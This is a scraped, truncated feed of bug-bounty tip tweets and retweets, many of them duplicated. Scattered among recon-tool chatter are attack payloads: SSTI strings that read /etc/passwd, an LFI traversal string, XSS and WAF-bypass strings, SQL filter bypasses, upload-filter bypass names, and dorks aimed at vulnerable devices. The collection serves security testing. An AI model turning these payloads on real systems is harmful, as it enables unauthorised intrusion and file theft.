This is my quick and practical blog post on how to get XSS in responses with Content-Ty

[Link]

#bugbounty #bugbountytip #BugBountyTips #infosec

Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
[Link]
#PenTest #Hacking #bugbountytips #redteam
RT @0xrudrapratap: @intigriti #bugbountytips
@intigriti #bugbountytips
RT @sw33tLie: Friendly reminder that zdns > massdns #bugbountytips
RT @LooseSecurity: I once exploited SSTI in flask app with payload:

{{ [Link]()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").r

If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountyt

payload not by me
Dear @pdiscoveryio 😍

Thanks for "httpx" tool works like Jet Plane🚀

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx

Bypass CSRF like a boss. Seven ways to bypass CSRF security by @harshbothra_

[Link]
#csrfbypass #bugbounty #cybersecurity #bugbountytips
RT @AmitMDubey: A small Burpsuite trick which helped me to find Blind SSRF -

Step 1: Use Intruder to Bruteforce Headers

Step 2: Add Burp collaborator URL as value.
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Tarborator Extension to monitor hits

#bugbounty #bugbountytips [Link]

RT @secalert: Regarding CVE-2020-5902:
[[Link]

there you will see the session files like:

"sess_XXYYXXYYXXYYXXYYXXYYXXYYXX".

Set this in the cookie and you are in admin's session. #bugbountytips
RT @hackison: #bugbounty #bugbountytip #bugbountytips #hacking #hackison #hacke
Find SSRF issues via inject headers (like x-forwarded-host,..etc) with this tool:
.
[Link]
#bugbountytips #bugbounty [Link]
RT @C1h2e11: A tips from Nahamsec @NahamSec
curl -X GET [Link]
[Link]
[Link] address}
Shodan search query ASN:{ASN}
#bugbountytip #bugbountytips [Link]
RT @HusseiN98D: WooT! There is always a way. New #bugbounty #pentest short write u
[Link]
RT @HusseiN98D: A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! AL
I'm interested in any security research team / pentest work (remote). If any company/t
Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips [Link]
RT @SpiderSec: 2FA Bypass Technique
#bugbounty #bugbountytips [Link]
RT @1m4xx0: And sometimes for (LFI)

url?para=//..//..//..//..//..//..//..//..//etc//passwd//

Works!!

#bugbountytip
#BugBounty
#bugbountytips
#bugbounty
RT @ja1sharma: Infosec meme for BugBounty hunters.
#Bugbounty #BurpSuite #Scanner #bugbountytips #infosec #MEMES #XSS #SQLi https
Shellshock still work for some server you can also try
nmap script.
Nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty [Link]
RT @malcolmx0x: host:attacker,com>> blcoked

host:attacker,com
x-forwarded-host:target,com>>ATO
#bugbountytips
RT @HossamSec: Add this endpoint to your DIRs list You may get lucky and access a das

/uplynk/examples/[Link]

Make your own private lists of DIRs while hunting and you may get lucky and access crit

#BugBountyTips #infosec [Link]

RT @HusseiN98D: Analysis of an RCE I found past week. RT and Like if you want more! I
Part 1: [Link]
Part 2: [Link]
#bugbountytips #bugbounty
RT @Santhoshvr97: use file:// instead of http:// in parameter.
sometimes it will bypass URL restrictions while redirect in page and use this payload to
it will work.. ✌️
Payload: [Link]

#bugbounty #bugbountytips #infosec

#xss
RT @anspattnaik: #bugbountytips #BugBounty
Just exploit template injection vulnerability {{7*7}} = 49
and I m pretty sure it's using Jinja2 template but when I trying below payload results ar

{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}

any suggestions?
RT @Sahad_nk: Found a JIRA SSRF and want to make it more impactful? Look for what's

#BugBounty #BugBountyTips #HackerOne #BugCrowd #Synack [Link]

RT @hackison: [Sensitive Directories] intitle:"Index of" [Link]

[Sensitive Directories] intitle:[Link]./.sql

[Pages Containing Login Portals] site:*/cgi-bin/[Link]

[Various Online Devices] inurl:[Link] [Link]

#dorks #hacking #bugbountytip #bugbountytips #pentesting

RT @HusseiN98D: Time for another #BugBountyTip : While testing file upload forms on I
RT @0x240x23elu: Find subdomain CNAME with one liner #bugbountytips #bug #subdom
This is my be old [Link]
RT @noobsec_org: Always view the page source code, sometime u get some GOLD like m

#bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehithard

RT @HusseiN98D: #BugBountyTip time: combine Arjun from @s0md3v with BurpIntuder
#bugbountytips #pentest RT & L
RT @HusseiN98D: #BugBountyTip time: I've got a RCE by using this tip: while testing fo
Sometime this fools the backend and you get shell! RTs & comments are appreciate
RT @cry__pto: Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest

RT @HusseiN98D: #BugBountyTip time: when you see a POST request made with JSON,
Follow, book coming!
RT @TakSec: XSS filter bypass using stripped </p> tag to obfuscate.

P2 Stored XSS $1500 on a private bug bounty program.

XSS Payload:
<</p>iframe src=javascript:alert()//

#xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic [Link]

RT @bugbountyvillag: Tip by @thedawgyg

When testing for SSRF using a black list, take internal IP addresses and when encoding

#bugbountytip #bugbounty #bugbountytips

RT @YourNextBugTip: All CSRF Bypasses from all over the net.

Last one is the most interested one (bypass XHTTPRequest check using flash), but not e

Did I miss anything?

#bugbountytips #bugbountytip #bugbounty [Link]
RT @bugbountynights: You can check Jira Information Disclosure vulnerability (CVE-201
RT @mrunal110: Find CNAME Records #bugbounty #vulnerability #informationsecurity #
#Bugbountytips [Link]
RT @_Y000_: Ondblclick xss Payloads

<h1 ondblclick=alert`_Y000!_`>_Y000!_</h1>

<marquee ondblclick=alert`_Y000!_`>_Y000!_</marquee>

<xss ondblclick="alert`_Y000!_`" autofocus tabindex=1>_Y000!_</xss>

<w="/x="y>"/ondblclick=`<`[confir\u006d`_Y000!_`]>z

#xss #payloads #bugbountytips

RT @kobsoNinja: Bypassing SSRF Filter using Enclosed Alphanumerics

AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④

Credit: @EdOverflow
#BugBountyTips
RT @ankit_2812: Bugbounty tips#2
Try this MySQL tricks to break some #WAFs out there.

SELECT-1e1FROM`test`
SELECT~[Link]`test`
SELECT\NFROM`test`
SELECT@^[Link]`test`
[Link]`test`

#SQLi #bypass #bugbountytip #bugbountytips #hackerone #HackThePandemic #hacke

RT @AbdoFarwan: Notes from @NahamSec's awesome interview with @inhibitor181.
#BugBounty
#bugbountytips [Link]
RT @Jhaddix: I know it's common sense but remember when parsing JS for endpoints/fi

/ = Root directory
. = This location
.. = Up a directory
./ = Current directory
../ = Parent of current directory
../../ = Two directories backwards

#bugbountytips ?
RT @HusseiN98D: Simple script to gather all TLDs of a company:

value=$(echo $1|cut -f1 -d.)

echo $value
sed -e "s/^/$value./" /root/wordlist/[Link] | filter-resolved

Usage: bash [Link] [Link]

#bugbountytips #bugbountytip [Link]
RT @Yumi_Sec: If a web application allow you to upload a .zip file, zip:// is an interestin

#BugBounty #BugBountyTips #InfoSec [Link]

RT @HusseiN98D: Testing Password Reset Functionnalities . If you can think of other tes
#BugBounty #BugBountyTips #BugBountyTip #pentest [Link]
RT @mark_valenzia: Massive thanks to @d0nutptr for his awesome blog on SSRF and @s
#bugbountynoob #bugbountytips [Link]
RT @pwntheweb: Bypassing most FILE Uploads filters for $$$$

* .htaccess <- upload htaccess

* [Link] <- uploading svg = xss
* [Link] <- must try case mismatch
* [Link]
* [Link]%[Link]
* [Link]' or '1'='1
* ../../[Link]
* file.'svg <- invalid ext.
#bugbountytips #BugBounty

Done with subdomain enumeration? here is how you can get more assets related to you

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips [Link]

RT @shreyasrx: Cambium ePMP 1000 Vulnerable for Command execution and changing o

1/2
Google dork >

intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*

A Lot of hosts are still vulnerable.

#bugbountytips
#shieldindia
#Hacking [Link]

RT @gwendallecoguic: Short @oneliner to retrieve altnames from ssl certificates. Thanks

[Link] [Link]
RT @SalahHasoneh1: ️Price Manipulation Method 3 ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @debangshu_kundu: Just bored.
So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
I just published Android App Security & Testing [Link]

It was long pending, found a draft in my notes, corrected it and thought why not share i

#androidsecurity #bugbountytips #bugbounty

RT @_sickwiz: Another govt website. Reported to @NCIIPC . Though they don't offer bou

#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability [Link]

Another govt website. Reported to @NCIIPC . Though they don't offer bounty but this ap

#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability [Link]

RT @Jhaddix: #bugbounty #bugbountytips People sometimes ask how you can "eyeball
discovery! [Link]
A series of articles I wrote about major changes in app development (microservices, CI/

1: Modern vs. Traditional apps:

[Link]

2: What is Modern AppSec:

[Link]

#bugbountytips
RT @Debian_Hunter: Best place for understanding Graphql , thnx man #bugbountytips #
RT @0xLupin: That's why you should stop reporting a simple alert box and start thinking

If you don't trust my words trust @MrMustacheMan3 and @brutelogic :)

#hacking #bugbounty #bugbountytips #hacker #XSS #RCE [Link]

RT @neutrinoguy: Best way to search Project Sonar database for subdomain enumeratio

[Link]

Credits to @CalumBoal
#bugbountytips
RT @ssh0x00r: thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor

#bugbountytips #Pentesting #hacking #infosec

thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor

#bugbountytips #Pentesting #hacking #infosec

RT @BeingBharatiyaa: @AmazonHelp @amazon getting error page by clicking on 'Comm
@AmazonHelp @amazon getting error page by clicking on 'Communication Preferences'
RT @bountyhunter_fr: Subdomain recon tools step by step :

1) amass - scan for subdomains

2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports

#bugbountytips
RT @AldenAous: Imperva Waf XSS ByPass :

Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9

Codepen : [Link]

#BugBounty #BugBountyTip #BugBountyTips #WhiteHats [Link]

RT @OAcybersecurity: FORD Session token URL lead to Reflected XSS #bugbountytips #
RT @sillydadddy: #bugbountytips

Does anyone has list of root domains of all public programs in the BB platforms ?
Could you please share ?
If not I am planning to make one and share

thanks
RT @Rajat_sharma111: Recently, I have started using the tool "Arjun" for finding the hi
Best place for understanding Graphql , thnx man #bugbountytips #bughunting #infosec
“Learning path for Bug Bounty” by Udit Bhadauria [Link]
#cybersecurity #bugbounty #bugbountytips
RT @adrien_jeanneau: A little #BugBountyTips that I use for my recon: use this Google D
RT @rapiddns: The [Link] Updates.

Added:

[*] 360 million mx records

[*] Support CIDR format query
[*] Subdomain query matches cname records

Removed:

[*] Recent query

#recon #bugbounty #bugbountytip #bugbountytips #hackerone [Link]

RT @s3rgiomazari3go: Note 3: Google Chrome uses an XSS auditor, which when testing
#bugbountytips #infosec #hacking
RT @thedarkwayg: Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty

The payload: javascript:@[Link]

Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd [Link]
RT @ryan_kl_ko: #uqcyber PhD student Walt Lin sharing his story on how he discovered
Note 3: Google Chrome uses an XSS auditor, which when testing thinks that you are doin
#bugbountytips #infosec #hacking
RT @cyberdefender5: Successfully Completed ✌✌🏻✌🏻 #Lookingforward #moretocome

#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe

Successfully Completed ✌✌
🏻✌🏻 #Lookingforward #moretocome

#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe

A good way to run linkfinder if you have a list of js files #infosec #bugbounty #bugboun
RT @Sudhans42246878: It's 6 35 I'm The morning
Couldn't sleep whole night
And now when I have come to bed ....I still can't sleep cause
I am hunting bugs and thinking of all the possible ways I can break into an WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
It's 6 35 I'm The morning
Couldn't sleep whole night
And now when I have come to bed ....I still can't sleep cause
I am hunting bugs and thinking of all the possible ways I can break into an WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
RT @renniepak: Check for stored XSS in emails. The email itself obviously doesn't trigge
RT @Xer0Days: Changed @0xbharath's VirusTotal sub-domains enumeration script. Craw

@appseccouk #bugbountytip #bugbounty #recon #bugbountytips

[Link]
#httpx v0.0.7 updates:-

☑Added TLS Probe (Subdomains from SSL)

☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length

[Link]

#hackwithautomation #bugbounty #security #bugbountytips [Link]

RT @INR_0x0Ma5K: My first Hall of fame for this platform @Bugcrowd, to happy and righ
Most of Duplicate. This one is boosting point for my side.
#bugbountytips #Bounty #hacklearning [Link]
My first Hall of fame for this platform @Bugcrowd, to happy and right path to servey. Ple
Most of Duplicate. This one is boosting point for my side.
#bugbountytips #Bounty #hacklearning [Link]
#uqcyber PhD student Walt Lin sharing his story on how he discovered a number of CVE
RT @hsakarp_ilajna: #Recon:
1. #Sudomain Scraping- Sublist3r, SubFinder, Amass

2 Subdomain #Bruteforcing- MassDNS with jhaddix_all.txt

3. Subdomain #Permutations scan- #AltDNS

4. #Repeat Step 2 to 3 for 3 times more to find Subs of Subs

#bugbountytips
#cybersecurity #infosec #ethicalhacking

RT @trbughunters: 🚀 CORS Protection RegEx Bypass 🚀

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

Need to trigger that xss payload, but parens are filtered? EZ!

Function`return alert````${[Link]}`

#xss #payload #filterevasion #bugbountytips #bugbounty

RT @rnd_infosec_guy: Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @dhakal_ananda: Yay! I earned $100 for a 0 user-interaction Account Takeover Vuln

Try re-registering the user with the same email. If the password gets reset, you got the

#bugbounty #bugbountytips
#PmG - Extract parameters/paths from urls

[Link]
#bugbountytips #recon [Link]
Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
[Link]
Friendly reminder that zdns > massdns #bugbountytips
Just bored.
So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @Jhaddix: Sunday Night #BugBounty #bugbountytips

1 Stored XSS
1 Reflected XSS
1 Admin Panel exposed to interwebz
1 potentially sensitive video exposed to the pub internet

Remember to check/search security-related GitHub issues for the frameworks you run a
RT @ehsayaan: I was very inconsistent about what should I do when hunting on a progr
#bugbounty #bugbountytips [Link]
RT @B3nac: Nice find! 🎉 Here's a adb one liner to list activities. adb shell dumpsys packa
[Link]
RT @GochaOqradze: Post based Cors misconfiguration PoC
#bugbountytips #bugbountytip [Link]
RT @ArmanSameer95: A Tool to find broken links: Broken Link Checker!
Check this out guys
[Link]
#bugbounty #bugbountytips #Hacking [Link]
RT @scspcommunity: #Bug #Bounty #Tips part 4!

#bugbounty #bugbountytips #ethicalhacking #hacking #pentesting #PenTest #infosec

[Link]
RT @sriramoffcl: Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
️RT @trbughunters: ️Top 25 Local File Inclusion (LFI) Parameters 🛡️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @OAcybersecurity: Hackerone CTF XSS Challenge $250 (BugPoc) 2020 [Link]
RT @ExploitedSystem: Hey Guys Just Uploaded a Video Checking it out would mean alot

#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw

RT @AniruddhaKl: Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

RT @AndyInfoSec_: Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

Subdomain Takeover 101 ..@EdOverflow Great Blog
learn a lot
[Link]
----
#togatherwelearn #bugbountytips
Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

#bugbounty #bugbountytips People sometimes ask how you can "eyeball" a site and kn
[Link]
Recently, I have started using the tool "Arjun" for finding the hidden parameters, howev
RT @Akshanshjaiswl: I just published my writeup on Pre-Access to Victim’s Account via
#bugbountytips #bugbountytip #bugbounty #infosec
Hey Guys Just Uploaded a Video Checking it out would mean alot ! Make Sure to Like an

#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw

RT @plenumlab: Very useful tool by @TomNomNom
Feed it urls it will give you a list of interesting ones, at least in theory, [Link]
#BugBounty #bugbountytips
Bypass I learned from @rene_kroka this week:
[Link]

onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,

👆 = alert(1)

#bugbounty #bugbountytips
Best way to search Project Sonar database for subdomain enumeration.

[Link]

Credits to @CalumBoal
#bugbountytips
#pentest #pentesting #hacking #bugbounty #bugbountytips #web #KaliLinux #linux #
Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
6 steps and 2 tools to attack JSON Web Token
[Link]
[Link]

#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec

Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-admin/[Link]

Triaged with "High" instead of "Critical" . Don't know what is wrong !

#bugbountytips Tweet has tip as well :D

@andirrahmani1 #bugbountytips
Changed @0xbharath's VirusTotal sub-domains enumeration script. Crawl all the result p

@appseccouk #bugbountytip #bugbounty #recon #bugbountytips

[Link]
RT @Digitalsanjog: Content Marketing: India is a country of storytellers. We have storyte
for more just gaze at
[Link]
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
Content Marketing: India is a country of storytellers. We have storytellers in every field
for more just gaze at
[Link]
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
RT @Jhaddix: Wednesday Night #BugBounty #bugbountytips

Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates

RT @ssh0x00r: interested in bug bounty ? (free tip by @NahamSec )

LINK IN BIO

#infosec #cybersecurity #hacking #bugbountytips

RT @ssh0x00r: i've been scratching my head for long time, thanks @stok @hakluke for

check this out: [Link]

#hacking #bugbountytips #infosec #motivation

RT @frankmosigisi: What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
RT @netspooky: #Cloudflare #WAFbypass

Just got a $1000 payout 💵📥

<uu src=@'@' onbigclick=import('//0a" "0a0a?0a/')>mou%09se<|/

#BugBountyTips #bugbountytip #redteam #waf #obfuscation #security #linux #togeth

RT @Nep_1337_1998: To Find #f5 instances

Shodan:
+-+-+-+-+-
F5-Login-Page
WWW-Authenticate: Basic realm=BIG-IP
BigIP
BIG-IP
[Link]:-335242539
[Link]:"BIG-IP®- Redirect"

[Link]

@dnkolegov #bugbountytips #f5 #recon #infosec @vis_hacker [Link]

RT @1m4xx0: [Link]
Made a simple directory search tool using python which will send notification on your Te

Feel free to use the code and modify according to your need!
#BugBounty #bugbountytips #bugbounty #python #redteam
RT @Unknownuser1806: Find #CVEs

[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

#bugbounty,#bugbountytips

Recon Tip for :

-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip [Link]

Second medium blog-post:

Stealing your Paytm information using XSS by: @VirenPawar_

[Link]

#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring

What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
i've been scratching my head for long time, thanks @stok @hakluke for a motivation

check this out: [Link]

#hacking #bugbountytips #infosec #motivation

#hacking #BugsBunny #bugbountytips #javabug #CVE
Javabug学习小项目
[Link]
RT @pdiscoveryio: Major #update to the public bounty and disclosure programs, we've a

- [Link]

#security #recon #bugbounty #bugbountytips #infosec

“How I Hacked My College’s Online Exam Portal During COVID-19 Quarantine Period” by

#bugbountytips
#xploitprotocol
[Link]
SQLTruncScanner - Scan endpoints for possible SQL Truncation vulnerabilities.

#bugbountytips
#xploitprotocol
[Link]
BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, toke
#bugbountytips

[Link]
interested in bug bounty ? (free tip by @NahamSec )

LINK IN BIO

#infosec #cybersecurity #hacking #bugbountytips

So happy with my HackerOne stats over these past 90 Days! #BugBounty #HackerOne #
#bugbountytips

Does anyone has list of root domains of all public programs in the BB platforms ?
Could you please share ?
If not I am planning to make one and share

thanks
FORD Session token URL lead to Reflected XSS #bugbountytips #bugbounty #hackerone
RT @disclose_io: New VDPs and #bugbounty programs at [Link]

Total: 926
Full safe harbor: 126 (13.6%)
Partial safe harbor: 207 (22.4%)

w/ Bounties: 399 (43.1%)

w/ HOF: 593 (64.0%)
w/ Swag: 45 (4.9%)

Missing yours? Submit a PR!

#bugbountytips #infosec #cybersecurity

The biggest takeaways from most talks are things I am already biased towards. Unlearn
Imperva Waf XSS ByPass :

Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9

Codepen : [Link]

#BugBounty #BugBountyTip #BugBountyTips #WhiteHats [Link]

RT @scspcommunity: #bugbounty tips part 2

#hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pent

[Link]
RT @scspcommunity: Bug Bounty Tips part 3

#bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bug

RT @scspcommunity: Take your #bugbounty game to a higher level with the Bug Bounty

#Pentesting #infosec #cybersecurity #informationsecurity #hacking #ethicalhacker #e

RT @BugBountyWeekly: You can use @hackvertor to generate random IP to bypass rate-
RT @scspcommunity: A little treasure for all you #BugBounty Hunters! 😉

#infosec #informationsecurity #infosecurity #CyberSecurity #cyber #cybersec #PenTes

HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loosing it) [Link]

August is going to be.. crazy!

feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec [Link]
Wednesday Night #BugBounty #bugbountytips

Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates

RT @william_leeser: #bugbountytips #BugBounty If you are starting now and don't have
This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences

[Link]

#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder

RT @AniruddhaKl: This is a short survey by @AndyInfoSec_ to learn about bug bounty hu

[Link]

#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder

This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences

[Link]

#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder

this is baller #bugbountytips [Link]
Technique, Tool and Lecture (TTL) #20
-
-
🤓 Follow @gainsec
-
[Link]
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
RT @FindomainApp: If you're using our services, look for "CODE: 502" and "ERROR: The
RT @mehmetcangunes: I was included in the Hall of Fame by GOOGLE😀

[Link]

#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame #bugbountytips http

RT @_Y000_: Xss payload

-->'"<h1><img src="/" =_=" title="onerror='javascript=pr\u006fmpt`_Y000

#payload #xss #bugbountytips [Link]

RT @TheJulfikar: extract endpoints from JavaScript files by @renniepak

cat [Link] | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s

#bugbountytips #bugbountytip #bugbounty [Link]

RT @UrielYochpaz: I can upload any file to a jetty server
But when i try uploading jsp files i get an Error "Could not initialize [Link]..."
Any help?
#bugbountytips
RT @hsakarp_ilajna: #IDOR_TIPS

[Link] url's of application from wayback machine using wayback script.

[Link] a script with custom wordlist to fuzz on obtained url.
3. One of them leaked sensitive content based on #application's workflow.

#bugbountytips #bugbounty #infosec #cybersecurity

RT @bountyhunter_fr: Password reset function token leak

After sending the password reset request, sometimes the reset token is leaked in the HT

#bugbountytips
RT @EvMd15: #bugbountytips #wordpresssecurity #wordpress

List backup file wp-config [Link]

#bugbountytips #wordpresssecurity #wordpress

List backup file wp-config [Link]

RT @chiraggupta8769: #FREE 2ಠ2ಠ ♥
Burp Suite Professional Edition v2020.7 x64 Full Activated + All Addons – Discount 100%

By @3XS0

Link : [Link]

#BurpSuite #bugbounty #bugbountytips [Link]

RT @Jhaddix: Tuesday Night #BugBounty #bugbountytips

Spend about 3 hours hunting. Didn't find anything.

RT @aish_kendle: Last week, collaborated with @thakare_prateek and hijacked 24+ sub

Some tips :
-Enumerate subdomains from multiple tools
-Do check the 404 pages
-Check the cname record
-Automate everything

#bugbounty #bugbountytips #recon [Link]

RT @pdnuclei: # Nuclei templates v2.0.6 updates.

- More CVEs.
- More takeovers.
- More workflows.
[Link]

Shout out to @dwisiswant0, @EdOverflow, adiffpirate, ankh2054,@nahoragg, @Marmela

#infosec #hackwithautomation #bugbountytips #pentest #cybersecurity [Link]

RT @JaggarHenry: Automating thousands of subdomain takeovers for fun and for profit.

[Link] [Link]
Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty

The payload: javascript:@[Link]

Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd [Link]
RT @r0bre: Today I'm releasing JSMon, an automated JS file change monitor for #bugbo
[Link]
Big thanks to @EdOverflow @Yassineaboukir for inspiring this & @TomNomNom @s
#bugbountytip #bugbountytips #hacking #infosec #recon [Link]
RT @ceos3c: Let's talk about UFW and VPS. Ethical Hacking Diaries #10 now up (video w

[Link]

#linux #cybersecurityawareness #cybersecurity #itsecurity #bugbounty #openbugbou

RT @Tismayil1: Yes I awarded 2200$ in Private Program.

USED Repos
Port Scan : [Link]
DirSearch : [Link]
Backup Scanner : [Link]

#BugBounty #bugbountytip #bugbountytips #WhiteHats [Link]

RT @t1nd19d: If your looking for flexibility when doing offensif forensic or data manip' ,

#bugbountytips #BugBounty
If your looking for flexibility when doing offensif forensic or data manip' , master regex

#bugbountytips #BugBounty
Password reset function token leak

After sending the password reset request, sometimes the reset token is leaked in the HT

#bugbountytips
Subdomain recon tools step by step :

1) amass - scan for subdomains

2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports

#bugbountytips
CORS vulnerability

[Link] not working? Try with [Link]

Sometimes the check is only on the domain name without the top level domain that you
#bugbountytips
Bash code for manuel subdomain takeover testing:

cat [Link] | xargs -n1 dig @[Link] | grep -A10 NXDO | grep CNAME

#BugBounty #bugbountytips #bugbountytip @hacktivist1337

Major #update to the public bounty and disclosure programs, we've added almost 200 n

- [Link]

#security #recon #bugbounty #bugbountytips #infosec

RT @xerosecurity: Stay up-to-date with the latest emerging security threats, vulnerabili

#hackers #hacking #bugbounty #bugbountytips #pentesting #pentest #redteam #OSIN

RT @TrainingBug: XSS COOKIE STEALING
[Link]
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
RT @TrainingBug: XSS on non existent parameters
[Link]
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
XSS on non existent parameters
[Link]
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
XSS COOKIE STEALING
[Link]
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: [Link] --url '[Link]
#bugbountytips #bugbountytip @rapiddns
RT @Shivam31200: A short p1 story inspired by
@ADITYASHENDE17 @Shubham_4500
#bugbounty #bugbountytips [Link]
📡via @securityweekly -pod w/ research recognition 2 @steventseeley 4 @SharePoint R

[Link]
#BugBounty #bugbountytips #bugbountytip #Cyber #Security #CyberSecurity #Podcas
RT @ome_mishra: Just scored a bounty of €1000 @intigriti, check my profile: [Link]
#HackWithIntigriti
#bugbountytips

Always Try Understand the application you will get something cool.... 🤘🏻
Very useful tool by @TomNomNom
Feed it urls it will give you a list of interesting ones, at least in theory, [Link]
#BugBounty #bugbountytips
RT @CyberRitesh: #Day11 #Challenge365

1) Critical File Found

2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty

#bugbountytips #CyberSecurity
#Day11 #Challenge365

1) Critical File Found

2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty

#bugbountytips #CyberSecurity
RT @InsiderPhD: New video!
This week we're answering a question: How do the pros find those CVEs before anyone e
#BugBounty #bugbountytips

[Link] [Link]